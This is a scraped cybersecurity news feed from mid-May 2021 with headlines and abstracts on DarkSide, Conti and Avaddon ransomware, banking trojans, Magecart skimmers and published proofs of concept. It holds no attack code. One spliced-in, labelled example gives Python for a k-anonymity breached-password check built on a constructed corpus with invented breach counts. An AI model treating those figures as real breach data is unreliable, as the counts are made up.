Abstract In July 2018, when Guizhou-Cloud Big Data (GCBD) agreed to a deal with state-owned telco China Telecom to move users' iCloud data belonging to Apple's China-based users to the latter's servers, the shift raised concerns that it could make user data vulnerable to state surveillance. Now, according to a deep-dive report from The New York Times, Apple's privacy and security concessions have "made it nearly impossible for the company to stop the Chinese government from gaining access to the emails, photos, documents, contacts and locations of millions of Chinese residents." The revelations stand in stark contrast to Apple's commitment to privacy, while also highlighting a pattern of conceding to the demands of the Chinese government in order to continue its operations in the country. Apple, in 2018, announced iCloud data of users in mainland China would move to a new data center in Guizhou province as part of a partnership with GCBD. The transitio

The Hacker News

May 18, 2021 – Hacker

A Deep Dive Into DarkSide Operations Full Text

Abstract The Colonial Pipeline, which carries fuel along a path of 5,500 miles all the way from Texas to New Jersey, was hacked by DarkSide ransomware operators. This ended up being the largest impact on the U.S. energy system from a cyberattack.

Cyware Alerts - Hacker News

May 18, 2021 – Government

Russian spy chief denies responsibility for SolarWinds hack Full Text

Abstract Russia’s spy chief is denying that his country is responsible for the cyberattack on IT group SolarWinds.

The Hill

May 18, 2021 – General

Free “vCISO Clinic” offers Resource-Constrained InfoSec Leaders a Helping Hand Full Text

Abstract Leaders in the InfoSec field face a strange dilemma. On the one hand, there are hundreds of thousands of resources available to find online to read (or watch) if they have questions – that's a benefit of a digital-first field. On the other hand, most leaders face challenges that – while not entirely unique each time – tend to require a specific touch or solution. For most, it would be great to have a sympathetic ear or a fresh perspective that has faced similar challenges. Where does the tip of the spear turn to for a helping hand? One popular avenue is to turn to a virtual CISO (or vCISO), an external consultant who can offer strategic advice, suggestions and help find insights that can be instrumental in building better security systems. For many organizations, having the benefits of a CISO, even on a temporary basis, can be incredibly helpful and valuable. With that in mind, Chris Roberts, Cynet's chief security strategist, is offering a new program ( you can learn more

The Hacker News

May 18, 2021 – Phishing

Consumers Warned About Surge in Meal Kit Delivery Scams Full Text

Abstract Fraudsters are increasingly impersonating meal kit delivery companies like Gousto

Infosecurity Magazine

May 18, 2021 – Ransomware

Analysis of NoCry ransomware: A variant of the Judge ransomware Full Text

Abstract Researchers at Tesorion released a decryptor for Judge ransomware that also decrypts files encrypted by the NoCry ransomware. In January this year, we published a blog post on our analysis of the Judge ransomware. We announced a free decryptor...

Security Affairs

May 18, 2021 – General

Verdict is in: Forward-thinking security controls prepared Jersey Courts for COVID Full Text

Abstract Jack McCarthy, CIO of the New Jersey Judiciary Court System, was on the golf course last March when he received a call from Jersey’s chief justice saying the courts would be shut down due to the pandemic. This immediately kicked off a sweeping business continuity and work-from-home initiative that emphasized user and data security.

SCMagazine

May 18, 2021 – General

Microsoft, Adobe Exploits Top List of Crooks’ Wish List Full Text

Abstract You can’t possibly patch all CVEs, so focus on the exploits crooks are willing to pay for, as tracked in a study of the underground exploit market.

Threatpost

May 18, 2021 – Ransomware

Newly Discovered Function in DarkSide Ransomware Variant Targets Disk Partitions Full Text

Abstract At the time of discovery, FortiGuard Labs researchers believed the ransomware was seeking out partitions to find possible hidden partitions setup by systems administrators to hide backup files.

Fortinet

May 18, 2021 – General

Experts Reveal Over 150 Ways to Steal Control of 58 Android Stalkerware Apps Full Text

Abstract A total of 158 privacy and security issues have been identified in 58 Android stalkerware apps from various vendors that could enable a malicious actor to take control of a victim's device, hijack a stalker's account, intercept data, achieve remote code execution, and even frame the victim by uploading fabricated evidence. The new findings, which come from an analysis of 86 stalkerware apps for the Android platform undertaken by Slovak cybersecurity firm ESET, highlight the unintended consequences of a practice that's not only unethical but in the process could also expose private and intimate information of the victims and leave them at risk of cyberattacks and fraud. "Since there could be a close relationship between stalker and victim, the stalker's private information could also be exposed," ESET researcher Lukas Stefanko said in a Monday write-up. "During our research, we identified that some stalkerware keeps information about the stalkers using

The Hacker News

May 18, 2021 – Phishing

Families of Missing Persons Receive Fake Ransom Demands Full Text

Abstract FBI warns that extortion scams are increasing

Infosecurity Magazine

May 18, 2021 – Ransomware

Breaking Down the Ransomware Trends in 2021 Full Text

Abstract It is to be expected that threat actors are not going to keep up their end of the bargain, even after paying the ransom. All or some part of the exfiltrated data has ended up online even after payment.

Cyware Alerts - Hacker News

May 18, 2021 – Attack

70 European and South American Banks Under Attack By Bizarro Banking Malware Full Text

Abstract A financially motivated cybercrime gang has unleashed a previously undocumented banking trojan, which can steal credentials from customers of 70 banks located in various European and South American countries. Dubbed "Bizarro" by Kaspersky researchers, the Windows malware is "using affiliates or recruiting money mules to operationalize their attacks, cashing out or simply to helping [sic] with transfers." The campaign consists of multiple moving parts, chief among them being the ability to trick users into entering two-factor authentication codes in fake pop-up windows that are then sent to the attackers, as well as its reliance on social engineering lures to convince visitors of banking websites into downloading a malicious smartphone app. Bizarro, which uses compromised WordPress, Amazon, and Azure servers to host the malware, is distributed via MSI packages downloaded by victims from sketchy links in spam emails. Launching the package downloads a ZIP archiv

The Hacker News

May 18, 2021 – General

NCSC Renews Bid to Improve Diversity and Inclusion in Cyber Full Text

Abstract Second annual survey will seek out areas for improvement

Infosecurity Magazine

May 18, 2021 – Policy and Law

2 Bills Introduced in Wake of Colonial Pipeline Attack Full Text

Abstract The ransomware attack on Colonial Pipeline Co. earlier this month has prompted lawmakers to introduce measures designed to address cybersecurity shortcomings in the nation's critical infrastructure.

Gov Info Security

May 18, 2021 – Ransomware

AXA Faces DDoS After Ransomware Attack Full Text

Abstract Avaddon group warns of more damage ahead

Infosecurity Magazine

May 18, 2021 – Phishing

Threat Actors Target South Korean and Aussie Users with Malicious Emails Disguised as Accounting Ledgers Full Text

Abstract Out of this, 98.34 percent of the attacks appear to have originated from IP addresses in Bangladesh, with 76.08% of targeted users in South Korea, 17% in Australia, and 1% in the US.

Bitdefender

May 18, 2021 – Ransomware

Irish health service may take weeks to recover from ransomware attack Full Text

Abstract “While it may take weeks to get all systems back, steady progress is being made, starting with services for the most urgent patients,” Health Minister Stephen Donnelly said on Twitter.

Reuters

May 18, 2021 – Botnet

Discovery of Simps Botnet Leads To Ties to Keksec Group Full Text

Abstract Uptycs' threat research team discovered a new botnet, tracked as Simps botnet, attributed to Keksec group, which is focused on DDOS activities. Uptycs' threat research team has discovered a new Botnet named 'Simps' attributed to Keksec group primarily...

Security Affairs

May 18, 2021 – Vulnerabilities

Object Injection Vulnerability Affects WordPress Versions 3.7 to 5.7.1 Full Text

Abstract There would need to be at least an additional vulnerability in another software component in place on the website – or an active compromise already taking place – for this to be an attack vector.

Sucuri

May 18, 2021 – Breach

Codecov hackers gained access to Monday.com source code Full Text

Abstract Monday.com has recently disclosed the impact of the Codecov supply-chain attack that affected multiple companies. As reported by BleepingComputer last month, popular code coverage tool Codecov had been a victim of a supply-chain attack that lasted for two months.

BleepingComputer

May 18, 2021 – Malware

Bizarro banking Trojan targets banks in Brazil and abroad Full Text

Abstract Bizarro is a new sophisticated Brazilian banking trojan that is targeting customers of tens of banks in Europe and South America. Researchers from Kaspersky have spotted a new sophisticated Brazilian banking trojan dubbed Bizarro that is targeting...

Security Affairs

May 18, 2021 – Ransomware

Lorenz: A New Ransomware Making Rounds Full Text

Abstract A ransomware gang that began operating a month ago and shares similarities with the ThunderCrypt operation has launched a double-extortion attack on its victims. Security agencies and professionals need to keep an eye on this threat and beef up defenses.

Cyware Alerts - Hacker News

May 18, 2021 – Malware

Magecart Hackers Spreading Malicious PHP Web Shells Full Text

Abstract A Magecart group continues to distribute new malware wherein attackers hide PHP-based web shell malware—masked as a favicon—in the targeted sites. The cybercrime syndicate is intensifying its efforts to compromise online stores with a wide range of attack vectors.

Cyware Alerts - Hacker News

May 18, 2021 – General

#RSAC: Bruce Schneier Warns of the Coming AI Hackers Full Text

Abstract AI hacking has the potential to reshape the cybersecurity landscape for good or for evil, Schneier warns in a grim RSA Conference keynote

Infosecurity Magazine

May 18, 2021 – Disinformation

#RSAC: The Invisible War of Internet Misinformation Full Text

Abstract RSA Conference keynoter Theresa Payton outlines how misinformation works and what organizations can do to help combat it

Infosecurity Magazine

May 17, 2021 – Breach

Student health insurance carrier Guard.me suffers a data breach Full Text

Abstract Student health insurance carrier guard.me has taken their website offline after a vulnerability allowed a threat actor to access policyholders' personal information.

BleepingComputer

May 17, 2021 – General

56% of security managers say today’s cyber workforce lacks soft skills Full Text

Abstract “We look for people with the right attitude, people who can be dynamic, and are eager to better themselves and eager to learn,” said Gregory Touhill of the Software Engineering Institute, during a panel at the RSA Conference. Unfortunately, those skills can be tough to come by.

SCMagazine

May 17, 2021 – Ransomware

Conti ransomware also targeted Ireland’s Department of Health Full Text

Abstract The Conti ransomware gang failed to encrypt the systems of Ireland's Department of Health (DoH) despite breaching its network and dropping Cobalt Strike beacons to deploy their malware across the network.

BleepingComputer

May 17, 2021 – Skimming

Magecart Goes Server-Side in Latest Tactics Changeup Full Text

Abstract The latest Magecart iteration is finding success with a new PHP web shell skimmer.

Threatpost

May 17, 2021 – General

Hillicon Valley: Parler’s return to Apple store poses new challenges | Biden revokes Trump-era order targeting shield for website operators Full Text

Abstract Parler is relaunching in the Apple App Store, with some additional content moderation policies in place for the new version of the controversial social media platform available for iPhones and iPads. A subsidiary group of a French Insurance giant was hit by a ransomware attack that impacted operations across Asia. Meanwhile, President Biden revoked a Trump-era order that targeted a controversial law that protects tech companies from liability for content posted by third parties.

The Hill

May 17, 2021 – General

Cyberattacks against critical infrastructure organizations spotlight an IT, OT cultural divide Full Text

Abstract Security teams that support IT and OT often find themselves at odds in terms of priorities and incident response tactics, heightening the risk that emerges as these two environments converge. Gamification is one tactic that helps address the conflict.

SCMagazine

May 17, 2021 – Ransomware

Ransomware victim shows why transparency in attacks matters Full Text

Abstract As devastating ransomware attacks continue to have far-reaching consequences, companies still try to hide the attacks rather than be transparent. Below we highlight a company's response to an attack that should be used as a model for all future disclosures.

BleepingComputer

May 17, 2021 – General

What a Year It’s Been: RSA 2021 Embraces ‘Resilience’ Full Text

Abstract Keynoters from Cisco, Netflix and RSA highlighted lessons from the last year, and cybersecurity’s new mandate in the post-pandemic world: Bounce back stronger.

Threatpost

May 17, 2021 – Phishing

FBI spots spear-phishing posing as Truist Bank to deliver malware Full Text

Abstract Threat actors impersonated Truist, the sixth-largest U.S. bank holding company, in a spear-phishing campaign attempting to infect recipients with what looks like remote access trojan (RAT) malware.

BleepingComputer

May 17, 2021 – Criminals

FIN7: Active Again with New Lizar Backdoor Full Text

Abstract The notorious cybercrime gang behind the Carbanak RAT is spreading a backdoor called Lizar under the guise of a Windows pen-testing tool for ethical hackers. Experts say the group may be planning to further sharpen its tools and techniques to make its attacks stealthier and more effective.

Cyware Alerts - Hacker News

May 17, 2021 – Criminals

Transparent Tribe Reappears with Expanded Malware Arsenal and TTPs Full Text

Abstract APT36 was found creating fake domains to impersonate military and defense firms and disseminate malware-laced documents to infect victims with ObliqueRAT and CrimsonRAT. Organizations are recommended to stay vigilant and implement adequate security measures proactively.

Cyware Alerts - Hacker News

May 17, 2021 – Attack

AXA insurance subsidiary group hit by ransomware attack in multiple Asian countries Full Text

Abstract A subsidiary group of French insurance giant AXA was hit by a ransomware attack last week that negatively impacted operations in multiple Asian countries.

The Hill

May 17, 2021 – Attack

FragAttacks: Affecting Millions of Wi-Fi Enabled Devices Full Text

Abstract A total of 12 design and implementation flaws in IEEE 802.11 technical standards leave all WiFi devices vulnerable to attacks. These flaws can be exploited by attackers within the radio range of the target.

Cyware Alerts - Hacker News

May 17, 2021 – General

#RSAC: RSA CEO Details the Challenges of Resilience in a World of Chaos Full Text

Abstract RSA CEO Rohit Ghai kicks off the annual RSA Security conference with an inspirational keynote defining what resilience is really all about.

Infosecurity Magazine

May 17, 2021 – General

#RSAC: Netflix Exec Explains Where Infosec Pros are Going Wrong Full Text

Abstract There are several hard truths that need to be addressed in the industry

Infosecurity Magazine

May 17, 2021 – General

Cisco and Netflix execs: The pandemic brought good, and some bad changes in security standards Full Text

Abstract Two executives mull on changes – big and small – to the business security environment in the wake of COVID.

SCMagazine

May 17, 2021 – Government

UK govt seeks advice on defending against supply-chain cyberattacks Full Text

Abstract Today, the UK government announced a call for advice on defending against software supply-chain attacks and on ways to strengthen IT managed service providers (MSPs) across the country. The move comes a week after President Biden issued an executive order to increase cybersecurity defenses across the U.S.

BleepingComputer

May 17, 2021 – General

Cyber investigations, threat hunting and research: More art than science Full Text

Abstract Defenders need to be 100% perfect at protecting 100% of the countless entry points 100% of the time in order to prevent breaches, while on the other hand, hackers only need one exploit that works.

Help Net Security

May 17, 2021 – Malware

Android stalkerware, a danger for victims and stalkers Full Text

Abstract ESET research shows that Android stalkerware apps are affected by vulnerabilities that further threaten victims. ESET research reveals that common Android stalkerware apps are affected by vulnerabilities that could expose the privacy and security...

Security Affairs

May 17, 2021 – Phishing

FBI warns of scammers targeting families of missing persons Full Text

Abstract The Federal Bureau of Investigation (FBI) warned that scammers actively target the vulnerable families of missing persons attempting to extort them using information shared on social media.

BleepingComputer

May 17, 2021 – Policy and Law

Deputy US Marshal Allegedly Framed Ex as Cyber-stalker Full Text

Abstract Cyber-stalking and perjury charges for deputy US marshal accused of framing his former girlfriend

Infosecurity Magazine

May 17, 2021 – Vulnerabilities

PoC released for wormable Windows IIS bug Full Text

Abstract Several security researchers and security firms who reviewed last week’s security updates considered the bug the most dangerous vulnerability Microsoft fixed in this month’s patch cycle.

The Record

May 17, 2021 – General

Miss Universe Speaks Out Against Cyber-bullying Full Text

Abstract Competition delegates share cyber-bullying experiences on video

Infosecurity Magazine

May 17, 2021 – Malware

Bizarro Banking Trojan Sports Sophisticated Backdoor Full Text

Abstract The advanced Brazilian malware has gone global, harvesting online-banking logins from infected Windows users.

Threatpost

May 17, 2021 – General

CISOs Struggle to Cope with Mounting Job Stress Full Text

Abstract Pandemic and evolving IT demands are having a major, negative impact on CISO’s mental health, a survey found.

Threatpost

May 17, 2021 – General

85% of breaches involve the human element Full Text

Abstract With an unprecedented number of people working remotely, phishing and ransomware attacks increased by 11 percent and 6 percent respectively, with instances of misrepresentation increasing by 15 times.

Help Net Security

May 17, 2021 – General

Two-thirds of CISOs Unprepared for Cyber-attack Full Text

Abstract Proofpoint’s "Voice of the CISO 2021 Report" reveals lack of attack-readiness

Infosecurity Magazine

May 17, 2021 – Business

Cisco Plans to Acquire Kenna Security, Boost Security Offerings Full Text

Abstract Cisco Systems (CSCO) plans to acquire privately-held California-based Kenna Security in a bid to enhance its security offerings. However, the financial terms of the deal were not disclosed.

Yahoo! Finance

May 17, 2021 – Ransomware

Three Ransomware Sites Go Dark and Three Major Hacking Forums Ban Ransomware Ads Full Text

Abstract Three hacking forums have now banned ransomware ads, three ransomware leak sites have gone down, and two other ransomware groups have announced plans to stop operating in public and go “private.”

The Record

May 17, 2021 – Government

UK Government May Force MSPs to Follow Security Standards Full Text

Abstract The DCMS has requested views on its proposals

Infosecurity Magazine

May 17, 2021 – Vulnerabilities

Exploit released for wormable Windows HTTP vulnerability Full Text

Abstract Proof-of-concept exploit code has been released over the weekend for a critical wormable vulnerability in the latest Windows 10 and Windows Server versions.

BleepingComputer

May 17, 2021 – Attack

Bizarro Banking Trojan Expands its Attacks to 70 Banks From European and South American Countries Full Text

Abstract Bizarro has x64 modules and is able to trick users into entering two-factor authentication codes in fake pop-ups. It may also use social engineering to convince victims to download a smartphone app.

Kaspersky Labs

May 17, 2021 – Breach

Student names, vendor bank account info exposed in Buffalo Public Schools cyberattack Full Text

Abstract Personal information about an unknown number of students, parents, and employees has been exposed, along with bank account information for an unknown number of vendors, the district revealed recently.

Buffalo News

May 17, 2021 – Vulnerabilities

Apple’s Find My Network Can be Abused to Exfiltrate Data From Nearby Devices Full Text

Abstract New research has demonstrated an exploit that enables arbitrary data to be uploaded from devices that are not connected to the Internet simply by sending Find My Bluetooth broadcasts to nearby Apple devices. "It's possible to upload arbitrary data from non-internet-connected devices by sending Find My [Bluetooth Low Energy] broadcasts to nearby Apple devices that then upload the data for you," Positive Security researcher Fabian Bräunlein said in a technical write-up disclosed last week. "Being inherent to the privacy and security-focused design of the Find My Offline Finding system, it seems unlikely that this misuse can be prevented completely." The study builds on a previous study by TU Darmstadt published in March 2021, which disclosed two distinct design and implementation flaws in Apple's crowdsourced Bluetooth location tracking system that could lead to a location correlation attack and unauthorized access to a user's lo

The Hacker News

May 17, 2021 – Policy and Law

Brazilian gang defrauds Uber, Lyft, DoorDash using GPS spoofing and stolen IDs Full Text

Abstract US authorities have charged a gang of Brazilian nationals for a scheme that defrauded the customers of services like Uber, Lyft, DoorDash, and two other unidentified food delivery services.

The Record

May 17, 2021 – General

Why Password Hygiene Needs a Reboot Full Text

Abstract In today's digital world, password security is more important than ever. While biometrics, one-time passwords (OTP), and other emerging forms of authentication are often touted as replacements for the traditional password, today this concept is more marketing hype than anything else. But just because passwords aren't going anywhere anytime soon doesn't mean that organizations don't need to modernize their approach to password hygiene right now. The Compromised Credential Crisis: As Microsoft's security team put it, "All it takes is one compromised credential…to cause a data breach." Coupled with the rampant problem of password reuse, compromised passwords can have a significant and long-lasting impact on enterprise security. In fact, researchers from Virginia Tech University found that over 70% of users employed a compromised password for other accounts up to a year after it was initially leaked, with 40% reusing passwords that were leaked over three years ago. Wh

The Hacker News
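
The article above frames the problem as compromised credentials being reused long after a leak. The practical counterpart is screening passwords against a breach corpus without ever sending the password itself. The following is an added example, not code from the article or from Microsoft: it implements the k-anonymity range protocol used by Have I Been Pwned's Pwned Passwords API (client sends the first five hex characters of the SHA-1 digest, server returns every known suffix under that prefix with its breach count, client matches locally). The "server" is a local function over a constructed corpus with made-up counts so that the exchange runs offline; the password corpus, counts and function names are assumptions, and a real deployment would replace lookup_range() with an HTTPS GET to https://api.pwnedpasswords.com/range/<prefix>.

```python
"""k-anonymity compromised-password check: both sides of the exchange.

Added example; the corpus below is constructed and the counts are invented.
"""
import hashlib
from collections import defaultdict

PREFIX_LEN = 5  # the range API keys on the first 5 hex chars of SHA-1


def sha1_hex(password):
    """Upper-case hex SHA-1, the form the Pwned Passwords range API uses."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(password):
    """Return (prefix, suffix): only the prefix is ever sent over the wire."""
    digest = sha1_hex(password)
    return digest[:PREFIX_LEN], digest[PREFIX_LEN:]


# ---- server side: bucket the breach corpus by hash prefix ---------------
def build_range_index(corpus):
    """corpus: {password: breach_count} (constructed). Returns {prefix: {suffix: count}}."""
    index = defaultdict(dict)
    for pw, count in corpus.items():
        prefix, suffix = split_hash(pw)
        index[prefix][suffix] = count
    return index


def lookup_range(index, prefix):
    """Server response for one prefix: 'SUFFIX:COUNT' lines, CRLF separated like the real API."""
    bucket = index.get(prefix, {})
    return "\r\n".join(f"{s}:{c}" for s, c in sorted(bucket.items()))


# ---- client side: parse the range and match locally ---------------------
def parse_range_response(text):
    """Turn 'SUFFIX:COUNT' lines into {suffix: count}; tolerates blank lines."""
    result = {}
    for line in text.splitlines():
        if ":" in line:
            suffix, count = line.split(":", 1)
            result[suffix.strip().upper()] = int(count)
    return result


def breach_count(password, range_lookup):
    """How many times the password appears in the corpus (0 means not found)."""
    prefix, suffix = split_hash(password)
    return parse_range_response(range_lookup(prefix)).get(suffix, 0)


# Constructed breach corpus standing in for the real data set (counts are invented).
SAMPLE_CORPUS = {"password": 3861493, "123456": 24230577, "letmein": 236000}
SAMPLE_INDEX = build_range_index(SAMPLE_CORPUS)


def is_compromised(password, index=SAMPLE_INDEX):
    """Client-side decision against the local 'server'."""
    return breach_count(password, lambda p: lookup_range(index, p)) > 0


if __name__ == "__main__":
    for candidate in ("password", "correct horse battery staple 7!"):
        print(candidate, "->", "compromised" if is_compromised(candidate) else "not in corpus")
```

The server never learns which of the returned suffixes, if any, the client matched, which is the property that makes it acceptable to run this check at login or password-change time against a third-party corpus.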

May 17, 2021 – Business

Cisco Snaps Up Kenna Security for Vulnerability Management Full Text

Abstract New capabilities will boost SecureX platform

Infosecurity Magazine

May 17, 2021 – Vulnerabilities

Expert released PoC exploit code for Windows CVE-2021-31166 bug Full Text

Abstract A security researcher has published a working proof-of-concept exploit code for a wormable Windows IIS server vulnerability tracked as CVE-2021-31166. Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities in Microsoft...

Security Affairs

May 17, 2021 – Ransomware

Update: Conti ransomware demanded $20M ransom from Ireland’s Health Service Executive Full Text

Abstract The incident caused cancellations and disruption to services at multiple hospitals in the country; fortunately, the ongoing coronavirus vaccination campaign was not affected.

Security Affairs

May 17, 2021 – Malware

Experts Warn About Ongoing AutoHotkey-Based Malware Attacks Full Text

Abstract Cybersecurity researchers have uncovered an ongoing malware campaign that heavily relies on the AutoHotkey (AHK) scripting language to deliver multiple remote access trojans (RATs) such as Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm on target Windows systems. At least four different versions of the campaign have been spotted since February 2021, according to researchers from Morphisec Labs. "The RAT delivery campaign starts from an AutoHotKey (AHK) compiled script," the researchers noted. "This is a standalone executable that contains the following: the AHK interpreter, the AHK script, and any files it has incorporated via the FileInstall command. In this campaign, the attackers incorporate malicious scripts/executables alongside a legitimate application to disguise their intentions." AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro creation and software automation, enablin

The Hacker News

May 17, 2021 – Ransomware

Cybercrime Forum Bans Ransomware Activity Full Text

Abstract XSS complains of “too much PR” from recent incidents

Infosecurity Magazine

May 17, 2021 – Business

Bitcoin down: 51% attack? No, put the blame on Elon Musk Full Text

Abstract The price of Bitcoin fell after Elon Musk suggested that his company, Tesla, may have sold its holdings of the cryptocurrency. There has long been debate about whether the Bitcoin price could be influenced by threat actors through 51% attacks,...

Security Affairs

May 17, 2021 – Ransomware

The new digital extortion Full Text

Abstract Payments to ransomware attackers rose 337% from 2019 to 2020, reaching more than $400 million worth of cryptocurrency, according to figures just released by Chainalysis, a blockchain analysis company.

Axios

May 17, 2021 – Ransomware

U.S. Pipeline Ransomware Attackers Go Dark After Servers and Bitcoin Are Seized Full Text

Abstract Just as Colonial Pipeline restored all of its systems to operational status in the wake of a crippling ransomware incident a week ago, DarkSide, the cybercrime syndicate behind the attack, claimed it lost control of its infrastructure, citing a law enforcement seizure. All the dark web sites operated by the gang, including its DarkSide Leaks blog, ransom collection site, and breach data content delivery network (CDN) servers, have gone dark and remain inaccessible as of writing. In addition, the funds from their cryptocurrency wallets were allegedly exfiltrated to an unknown account, according to a note passed by DarkSide operators to its affiliates. "At the moment, these servers cannot be accessed via SSH, and the hosting panels have been blocked," the announcement obtained by Intel 471 read. The development comes as DarkSide closed its Ransomware-as-a-Service (RaaS) affiliate program for good "due to the pressure from the U.S.", with the group stating th

The Hacker News

May 17, 2021 – Ransomware

Toshiba Business Reportedly Hit by DarkSide Ransomware Full Text

Abstract Ransomware group said to have stolen over 700GB of data

Infosecurity Magazine

May 17, 2021 – Ransomware

Conti ransomware demanded $20M ransom from Ireland’s Health Service Executive Full Text

Abstract Ireland’s Health Service Executive (HSE) refuses to pay a $20 million ransom demand after its systems were hit by the Conti ransomware gang. Ireland’s Health Service Executive was forced to shut down its IT systems on Friday after being...

Security Affairs

May 17, 2021 – Ransomware

The bizarre story of the inventor of ransomware Full Text

Abstract Although it was a pretty basic malware, it was the first time many people had ever heard of the concept — or of digital extortion. It's unclear if any people or organizations paid the ransom.

CNN Money

May 17, 2021 – Vulnerabilities

AMD Warns of Two Attacks That Could Allow Bypassing of SEV Protection System Full Text

Abstract AMD has issued guidance for two attacks (CVE-2020-12967, CVE-2021-26311) that allow bypassing SEV (Secure Encrypted Virtualization), the technology meant to protect a guest VM's memory from a compromised or malicious hypervisor. In both cases an attacker who controls the hypervisor can inject and execute arbitrary code inside a guest VM.

Security Affairs

May 17, 2021 – Malware

Clark County confirms malware shut down computer servers Full Text

Abstract The county’s 911 system remained working amid the incident. Elements of the county’s server are gradually coming back online. However, county officials say the process is still ongoing.

Springfield News-Sun

May 17, 2021 – Ransomware

Avaddon Ransomware gang hacked France-based Acer Finance Full Text

Abstract The Avaddon ransomware gang has made the headlines again: the cybercrime gang has breached the France-based financial consultancy firm Acer Finance and gave the firm 240 hours to cooperate with its demands.

Security Affairs

May 17, 2021 – General

Social Engineering: How to Keep Security Researchers Safe Full Text

Abstract Attacking the very people who work on stopping threat actors may seem like a bad idea. But some threat groups do go after people who’ve made a career doing vulnerability research.

Security Intelligence

May 16, 2021 – Ransomware

Insurer AXA hit by ransomware after dropping support for ransom payments Full Text

Abstract Branches of insurance giant AXA based in Thailand, Malaysia, Hong Kong, and the Philippines have been struck by a ransomware cyber attack. As seen by BleepingComputer yesterday, the Avaddon ransomware group claimed on their leak site that they had stolen over 3 TB of sensitive data from AXA's Asian operations.

BleepingComputer

May 16, 2021 – Ransomware

Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia Full Text

Abstract The Avaddon ransomware gang has made the headlines again: the cybercrime gang has breached the France-based financial consultancy firm Acer Finance. Acer Finance...

Security Affairs

May 16, 2021 – Vulnerabilities

Two flaws could allow bypassing AMD SEV protection system Full Text

Abstract The chipmaker AMD published guidance for two new attacks against its SEV (Secure Encrypted Virtualization) protection technology. Chipmaker AMD has issued guidance for two attacks (CVE-2020-12967, CVE-2021-26311) that allow bypassing the SEV (Secure...

Security Affairs

May 16, 2021 – Breach

Herff Jones credit card breach impacts college students across the US Full Text

Abstract Graduating students from several universities in the U.S. have been reporting fraudulent transactions after using payment cards at popular cap and gown maker Herff Jones.

BleepingComputer

May 16, 2021 – Breach

Colonial breach underscores concerns over paying hackers Full Text

Abstract Colonial Pipeline's decision to pay the cyber criminals behind a ransomware attack that forced the company to temporarily shut down operations has reignited the debate around whether victims of such attacks should pay to regain access to their networks.

The Hill

May 16, 2021 – Malware

MSBuild tool used to deliver RATs filelessly Full Text

Abstract Hackers abuse Microsoft Build Engine (MSBuild) to filelessly deliver malware, including RATs and password stealers, on targeted Windows systems. Researchers from Anomali observed threat actors abusing Microsoft Build Engine (MSBuild) to filelessly deliver...

Security Affairs

May 16, 2021 – General

Security Affairs newsletter Round 314 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. CISA MAR report provides technical details of FiveHands Ransomware; SQL injection issue in Anti-Spam...

Security Affairs

May 16, 2021 – APT

Pakistan-linked Transparent Tribe APT expands its arsenal Full Text

Abstract Alleged Pakistan-Linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware. Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal....

Security Affairs

May 15, 2021 – Ransomware

Ireland’s Health Services hit with $20 million ransomware demand Full Text

Abstract Ireland's health service, the HSE, says they are refusing to pay a $20 million ransom demand to the Conti ransomware gang after the hackers encrypted computers and disrupted health care in the country.

BleepingComputer

May 15, 2021 – Phishing

Fake Chrome App Goes Viral with Smishing Full Text

Abstract A new Android malware has surfaced that fakes the Google Chrome app. Attackers used it as part of a sophisticated hybrid cyberattack campaign that also uses mobile phishing to steal credentials.

Cyware Alerts - Hacker News

May 15, 2021 – Policy and Law

European police dismantle major online investment fraud ring that caused €30 Million in losses Full Text

Abstract A joint operation of European law enforcement agencies and coordinated by Europol dismantled a criminal ring involved in investment fraud. A joint investigation of European law enforcement agencies supported by Europol and Eurojust dismantled...

Security Affairs

May 15, 2021 – Privacy

Tor users, beware: ‘Scheme flooding’ technique may be used to deanonymize you Full Text

Abstract FingerprintJS said it has identified a more dubious fingerprinting technique capable of generating a consistent identifier across different desktop browsers, including the Tor Browser.

The Register

May 15, 2021 – Hacker

Group behind Colonial Pipeline hack to shut down operations: report Full Text

Abstract The group behind the ransomware attack on Colonial Pipeline is reportedly shutting down its operations.

The Hill

May 15, 2021 – Ransomware

Major hacking forums XSS and Exploit ban ads from ransomware gangs Full Text

Abstract XSS forum (previously known as DaMaGeLab), one of the most popular hacking forums, announced that it would ban the ads published by ransomware gangs. The popular hacking forum XSS forum, previously known as DaMaGeLab, announced that it would ban the ads published...

Security Affairs

May 15, 2021 – Ransomware

Toshiba subsidiary confirms ransomware attack, as reports suggest possible DarkSide involvement Full Text

Abstract European units of Japanese tech giant Toshiba are investigating a security incident in which scammers may have used a similar hacking tool to the malware used against IT systems at Colonial Pipeline.

Cyberscoop

May 15, 2021 – Ransomware

QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks Full Text

Abstract QNAP warns of an actively exploited Roon Server zero-day flaw and eCh0raix ransomware attacks on its NAS devices. QNAP warns customers of threat actors that are targeting its Network Attached Storage (NAS) devices with eCh0raix ransomware attacks...

Security Affairs

May 15, 2021 – Ransomware

Lorenz Ransomware Uses Customized Malware to Target Organizations Full Text

Abstract Dubbed Lorenz, the ransomware gang began operating a month ago and has since compiled a growing list of victims whose stolen data has been published on a data leak site, as reported by BleepingComputer.

Heimdal Security

May 14, 2021 – Ransomware

Ransomware ads now also banned on Exploit cybercrime forum Full Text

Abstract The team behind Exploit, a major cybercrime forum used by ransomware gangs to hire affiliates and advertise their Ransomware-as-a-Service (RaaS) services, has announced that ransomware ads are now banned and will be removed.

BleepingComputer

May 14, 2021 – Attack

Toshiba unit hacked by DarkSide, conglomerate to undergo strategic review Full Text

Abstract Toshiba Tec Corp, which makes products such as bar code printers and is valued at $2.3 billion, was hacked by DarkSide - the group behind the Colonial Pipeline attack, its French subsidiary said.

Reuters

May 14, 2021 – General

Hillicon Valley: Amazon worker alleges security had keys to mailbox used in union vote | Facebook loses bid to block Irish watchdog’s data flow decision | Lawmakers move to defend pipelines against cyber threats Full Text

